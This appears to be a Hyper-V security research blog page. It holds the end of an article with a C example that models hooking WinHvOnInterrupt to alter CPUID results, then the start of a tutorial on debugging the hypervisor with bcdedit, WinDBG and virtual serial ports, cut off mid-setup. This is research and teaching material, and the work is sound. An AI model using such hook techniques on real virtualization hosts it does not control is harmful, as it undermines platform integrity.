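<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The following is an added user-mode example, not code from the article or from the hyperv4 driver. It models both steps described above: parsing the CPUID intercept message in SIM slot 0 and patching DefaultResultRdx for leaf 0x11114444 (as PrintCpuidInterceptMessage does), and then handing the message back to the original handler, as the hook on WinHvOnInterrupt does. The structure layouts, the message type value 0x8001000A and the PayloadSize semantics are assumptions following the field names of the article and the Hyper-V TLFS; StandInOriginal and the SIM page contents are constructed for the example.</span></div>

```c
/* Added example (not code from the article or the hyperv4 driver): a user-mode
 * model of the CPUID intercept path. It parses SIM slot 0, patches
 * DefaultResultRdx for the magic leaf 0x11114444 and then hands the message to
 * the "original" handler. Structure layouts are simplified assumptions that
 * follow the field names used in the article and the Hyper-V TLFS. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HV_MESSAGE_PAYLOAD_BYTES        240         /* 256-byte slot minus 16-byte header */
#define HV_SIM_SLOTS                    16
#define HV_MESSAGE_TYPE_NONE            0x00000000u
#define HV_MESSAGE_TYPE_CPUID_INTERCEPT 0x8001000Au /* HvMessageTypeX64CpuidIntercept (assumed value) */
#define TEST_CPUID_LEAF                 0x11114444u /* values from the article */
#define PATCHED_RDX                     0x12345678u

typedef struct {
    uint32_t MessageType;
    uint8_t  PayloadSize;      /* payload length in bytes (assumption) */
    uint8_t  MessageFlags;
    uint8_t  Reserved[2];
    uint64_t Sender;           /* partition id or port id, unused here */
} HV_MESSAGE_HEADER;

typedef struct {
    HV_MESSAGE_HEADER Header;
    uint64_t Payload[HV_MESSAGE_PAYLOAD_BYTES / sizeof(uint64_t)];
} HV_MESSAGE, *PHV_MESSAGE;

typedef struct {               /* simplified intercept header (assumed layout) */
    uint32_t VpIndex;
    uint8_t  InstructionLength;
    uint8_t  InterceptAccessType;
    uint16_t ExecutionState;
    uint8_t  CsSegment[16];
    uint64_t Rip;
    uint64_t Rflags;
} HV_X64_INTERCEPT_MESSAGE_HEADER;

typedef struct {
    HV_X64_INTERCEPT_MESSAGE_HEADER Header;
    uint64_t Rax, Rcx, Rdx, Rbx;                  /* guest registers at CPUID */
    uint64_t DefaultResultRax, DefaultResultRcx;  /* what the hypervisor would return */
    uint64_t DefaultResultRdx, DefaultResultRbx;
} HV_X64_CPUID_INTERCEPT_MESSAGE, *PHV_X64_CPUID_INTERCEPT_MESSAGE;

typedef void (*ORIGINAL_HANDLER)(PHV_MESSAGE);   /* stands in for the original WinHvOnInterrupt */

/* Same decision as the article's PrintCpuidInterceptMessage, minus the DbgLog
 * calls and with two checks added: the slot really holds a CPUID intercept and
 * the payload is long enough. Returns 1 if DefaultResultRdx was patched. */
int HandleCpuidIntercept(PHV_MESSAGE hvMessage)
{
    if (hvMessage->Header.MessageType != HV_MESSAGE_TYPE_CPUID_INTERCEPT)
        return 0;
    if ((size_t)hvMessage->Header.PayloadSize < sizeof(HV_X64_CPUID_INTERCEPT_MESSAGE))
        return 0;
    PHV_X64_CPUID_INTERCEPT_MESSAGE phvCPUID = (PHV_X64_CPUID_INTERCEPT_MESSAGE)hvMessage->Payload;
    if (phvCPUID->Rax != TEST_CPUID_LEAF)       /* EAX zero-extends into RAX in long mode */
        return 0;
    phvCPUID->DefaultResultRdx = PATCHED_RDX;
    return 1;
}

/* The hook: inspect slot 0 (SINT0) of the SIM page, then pass control back to
 * the original handler so the vid.sys processing still runs. */
int OnInterruptHook(HV_MESSAGE *simPage, ORIGINAL_HANDLER original)
{
    int patched = HandleCpuidIntercept(&simPage[0]);
    if (original != NULL)
        original(&simPage[0]);
    return patched;
}

static int g_originalCalls;      /* counts hand-offs to the stand-in original handler */
static void StandInOriginal(PHV_MESSAGE m) { (void)m; g_originalCalls++; }

/* Builds a constructed SIM page (test data, not a captured message) whose slot 0
 * holds a message of the given type for a guest that ran CPUID with RAX = guestRax. */
void BuildSimPage(HV_MESSAGE *simPage, uint32_t messageType, uint64_t guestRax)
{
    memset(simPage, 0, sizeof(HV_MESSAGE) * HV_SIM_SLOTS);
    simPage[0].Header.MessageType = messageType;
    simPage[0].Header.PayloadSize = (uint8_t)sizeof(HV_X64_CPUID_INTERCEPT_MESSAGE);
    PHV_X64_CPUID_INTERCEPT_MESSAGE c = (PHV_X64_CPUID_INTERCEPT_MESSAGE)simPage[0].Payload;
    c->Header.Rip = 0x00007ff6c0de1000ull;                   /* constructed guest RIP */
    c->Rax = guestRax;
    c->DefaultResultRax = 0xAAAA; c->DefaultResultRdx = 0xDDDD; /* constructed defaults */
}

/* Runs one intercept through the hook and returns the RDX the guest would see. */
uint64_t ResultRdxFor(uint32_t messageType, uint64_t guestRax)
{
    HV_MESSAGE sim[HV_SIM_SLOTS];
    BuildSimPage(sim, messageType, guestRax);
    OnInterruptHook(sim, StandInOriginal);
    return ((PHV_X64_CPUID_INTERCEPT_MESSAGE)sim[0].Payload)->DefaultResultRdx;
}

int OriginalHandlerCalls(void) { return g_originalCalls; }

int main(void)
{
    printf("leaf 0x%x -> rdx 0x%llx\n", TEST_CPUID_LEAF,
           (unsigned long long)ResultRdxFor(HV_MESSAGE_TYPE_CPUID_INTERCEPT, TEST_CPUID_LEAF));
    printf("leaf 0x0 -> rdx 0x%llx\n",
           (unsigned long long)ResultRdxFor(HV_MESSAGE_TYPE_CPUID_INTERCEPT, 0));
    return 0;
}
```

<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The two added checks (message type and payload length) are what the article's driver omits: a hook on WinHvOnInterrupt sees every message delivered to SINT0, not only CPUID intercepts, so casting the payload without looking at MessageType would patch unrelated messages. The hand-off to the original handler is unconditional, which matches the behaviour described above: a handler installed by vid.sys for the same conditions would still run after the patch and could change the result again.</span></div>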
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In conclusion, I will say that the article is rather an overview demonstrating some virtualization features and components of Microsoft; however, I hope these examples will help you get a better understanding of these components and allow a more detailed analysis of their security.</span><br />
<br />
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><b><b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Files: https://drive.google.com/file/d/0B8WEjIxRncDRUVFLWGhXN0xDMHc</span></b></b> </span></div>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Gerhart</span></div>
</b></div>
Hyper-V debugging for beginners (Gerhart X, published 2015-10-22, updated 2019-04-03)<div dir="ltr" style="text-align: left;" trbidi="on">
<b style="font-weight: normal;"></b><br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Great thanks to ERNW for the translation of the article!</span></b></div>
<b style="font-weight: normal;">
</b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<b style="font-weight: normal;"><br /></b></div>
<b style="font-weight: normal;">
</b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This is a translation of the article published on securitylab.ru - http://www.securitylab.ru/contest/444112.php with some fixes for the latest Hyper-V version (Windows Server 2016 TP2).</span></b></div>
<b style="font-weight: normal;">
</b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VMware Workstation 12, WinDBG 10, IDA Pro and different versions of Windows were used for the study. When creating the VMware virtual machine, set the guest OS type to Hyper-V and set the number of processors and cores to 1. Enable Virtualize Intel VT-x/EPT, install Windows Server 2016 TP2 and activate the Hyper-V role (the GUI can be installed too), then install Windows 10 x64 as a Hyper-V guest.</span></b></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">1.</span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Terms and definitions</span></b></div>
<b style="font-weight: normal;">
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">The hypervisor –</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> the core component of Hyper-V; the binary depends on the processor vendor (hvix64.exe for Intel and hvax64.exe for AMD). The article discusses the hypervisor for Intel processors.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Hypercall – </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">a call to a given hypervisor function using the vmcall instruction.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Root-partition – </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows Server 2016 TP2 with the Hyper-V component enabled.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">VMCS (virtual-machine control structure) – </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">a structure that defines the logic of the hypervisor.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">VMX root – </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">the mode in which the hypervisor runs.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 0.049pt;">
<span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">VMX non-root – </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">the mode in which the guest operating system and its application software run.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 0.049pt;">
<span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">VM exit – </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">the transition from </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">VMX non-root </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">into </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">VMX root. </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It occurs when the guest executes instructions, or meets conditions, that are specified in the VMCS; the transition itself is implemented directly in the processor logic.</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.</span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Debugging</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Hyper-V consists of several components; a brief description can be found in (1). All components except the hypervisor can be debugged with the standard methods; to connect to the hypervisor, however, a few extra steps are needed to configure the root partition.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For debugging the hypervisor, Microsoft developed a special WinDBG extension, hvexts.dll, which unfortunately is not included in the debugger distribution and is available only to partners (probably because the extension needs symbols for hvix64.exe, which are not published). Also, the winxp directory inside the WinDBG folder contains the nvkd.dll extension, intended for debugging Hyper-V virtual switch extensions.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MSDN (2) and (3) describe debugging the hypervisor over a COM-port cable, which implies two physical machines. However, the hypervisor can also be debugged if it runs inside VMware and the Free Virtual Serial Ports COM-port emulator from HHD Software (4) is used. To do this:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">create a COM port for the virtual machine (Hardware->Add->Serial port->Output to a named pipe)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="294" src="https://lh5.googleusercontent.com/JcDtvVPS4H6mRKl0_AyePQXjgz0Atxjn12v0RYIxjCa_-AaRydjYNtywgeJIb-TL27XbX7BMrYiqRRwrzAcyw70k4_6ea0XSidBUekHIaDaiw1mL8FBJYyFTZfRI5cOBHsGnDQyShdWougG8" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="321" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">in the root partition, run the commands that configure debugging of the hypervisor and of the OS:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /hypervisorsettings serial DEBUGPORT:1 BAUDRATE:115200</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /set hypervisordebug on </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /set hypervisorlaunchtype auto</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /set dbgtransport kdhvcom.dll </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /dbgsettings serial DEBUGPORT:1 BAUDRATE:115200</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /debug on</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /set bootdebug on </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(needed to study the hypervisor loading process)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">restart Windows Server 2016 TP2. Loading will stop while waiting for the debugger connection.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">run Free Virtual Serial Ports, select </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Pipe </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">and press </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Create</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. In the </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Pipe name </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">field specify the same value as for the virtual machine: \\.\pipe\com_1. Press </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Create.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="362" src="https://lh3.googleusercontent.com/FdvBkF6wqZMpViq2yyJzWsN9CV8xgBn5gKFomua0fyeCcHQrIep3_DfT-wA4Ena4vOs-wHU03EiNHLvK2ck34jODm7It7Sc-HqxpPkmK7dSTDBL2JrkuCrNTys6OC_LIWoi-XJXgSSA-HzSo" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="324" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If the connection to the named pipe succeeds, a virtual COM port is created:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="284" src="https://lh5.googleusercontent.com/tQcopfDxSHbBsMHEVPkyJc2KzbzJ2yD-_oHH2Ce5fOBEm4gJBpckPEwC_BZ1VKSKxga7Ip5JB8Jsz_cHRKsKah8k6pIp4NFjHUxeU3-g3L7GSQDxNF7aFs2GJWX_5DScamE3RtrKAkNJ0u9O" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="382" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">run vmdemux (located in the WinDBG setup directory), specifying the port name as one of the parameters:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">vmdemux.exe -src com:port=com2,baud=115200</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In case of a successful connection we get:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="237" src="https://lh5.googleusercontent.com/SXDY6b_X8szqh0WBTznRRk5IR1m-msaYHC7iFOMa863gA0l2mXde-SqUBoQtZ3tX4cT94kdr0QVG8peSkDv2cfG0GFXJUuaYJb2EukYvO3UB2hT29x6gLSxXBoDRDwbxyUZ_Ee92vx9il9MW" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="462" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The named pipe \\.\pipe\Vm1 that it creates must be used to attach the debugger:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
